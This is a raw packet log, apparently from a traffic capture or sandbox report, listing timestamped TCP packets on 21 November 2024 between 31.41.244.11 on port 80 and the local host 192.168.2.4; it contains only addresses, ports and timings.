                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.124334097 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.124402046 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.124445915 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.124490023 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.125644922 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.125714064 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.125808954 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.125901937 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.126557112 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.126676083 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.126681089 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.126734018 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.127590895 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.127643108 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.127701044 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.127839088 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.128885031 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.128901005 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.128945112 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.128964901 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.129750967 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.129806995 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.129858971 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.129924059 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.130892992 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.130960941 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.131006002 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.131053925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.131952047 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.132008076 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.132050037 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.132102013 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.133034945 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.133078098 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.133122921 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.133167982 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.134174109 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.134200096 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.134227991 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.134246111 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.135262012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.135310888 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.135351896 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.135400057 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.136363029 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.136379004 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.136413097 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.136442900 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.137382030 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.137526035 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.137572050 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.137619019 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.138475895 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.138534069 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.138540983 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.138578892 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.139604092 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.139672041 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.139698982 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.139748096 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.140778065 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.140929937 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.140985012 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.141762018 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.141820908 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.141859055 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.141906977 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.142945051 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.142987013 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.143002033 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.143029928 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.143928051 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.143981934 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.144083023 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.144139051 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.145047903 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.145100117 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.145246029 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.145292997 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.146146059 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.146197081 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.146368027 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.146416903 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.147197962 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.147248983 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.147320032 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.147531033 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.148282051 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.148359060 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.148406982 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.148458958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.149529934 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.149578094 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.149650097 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.149699926 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.150460958 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.150590897 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.150645971 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.151705027 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.151740074 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.151765108 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.151804924 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.152653933 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.152714014 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.152745962 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.152798891 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.153853893 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.153907061 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.154083967 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.154141903 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.154921055 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.154980898 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.155026913 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.155077934 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.155961037 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.156006098 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.156016111 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.156064987 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.157043934 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.157161951 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.157165051 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.157210112 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.158097982 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.158158064 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.158216000 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.158302069 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.159207106 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.159233093 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.159266949 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.159286022 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.160285950 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.160337925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.160423040 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.160474062 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.161365986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.161417961 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.161483049 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.161562920 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.162455082 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.162506104 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.162583113 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.162627935 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.163636923 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.163692951 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.163779020 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.163830042 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.164582014 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.164762974 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.318593025 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.318675995 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.318747044 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.318959951 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.319015980 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.319355011 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.319402933 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.319885969 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.319931030 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.320018053 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.320063114 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.321095943 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.321206093 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.321254015 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.322096109 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.322169065 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.322215080 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.322259903 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.323183060 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.323236942 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.323295116 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.323337078 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.324301958 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.324347019 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.324440956 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.324486017 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.325349092 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.325434923 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.325470924 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.325516939 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.326456070 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.326503038 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.326577902 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.326623917 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.327564001 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.327610970 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.327665091 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.327709913 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.328650951 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.328695059 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.328782082 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.329638958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.329685926 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.329736948 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.329809904 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.329883099 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.330795050 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.330853939 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.330899954 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.331850052 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.331907988 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.331974983 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.332020044 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.332977057 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.333081961 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.333125114 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.334052086 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.334098101 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.334131002 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.334181070 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.335129023 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.335278034 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.335341930 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.336231947 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.336355925 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.336405993 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.337327003 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.337451935 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.337501049 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.338413000 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.338459015 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.338541031 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.338587046 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.339544058 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.339603901 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.339637041 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.339680910 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.340586901 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.340651035 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.340697050 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.340744019 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.341723919 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.341773033 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.341845989 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.341892958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.342782974 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.342853069 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.342911959 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.342957973 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.343936920 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.343997002 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.344965935 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.345010996 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.345055103 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.345108986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.345155954 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.346329927 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.346353054 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.346379995 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.346401930 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.347121954 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.347167969 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.347225904 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.347270966 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.348238945 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.348288059 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.348292112 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.348473072 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.349322081 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.349370003 CET4977080192.168.2.431.41.244.11
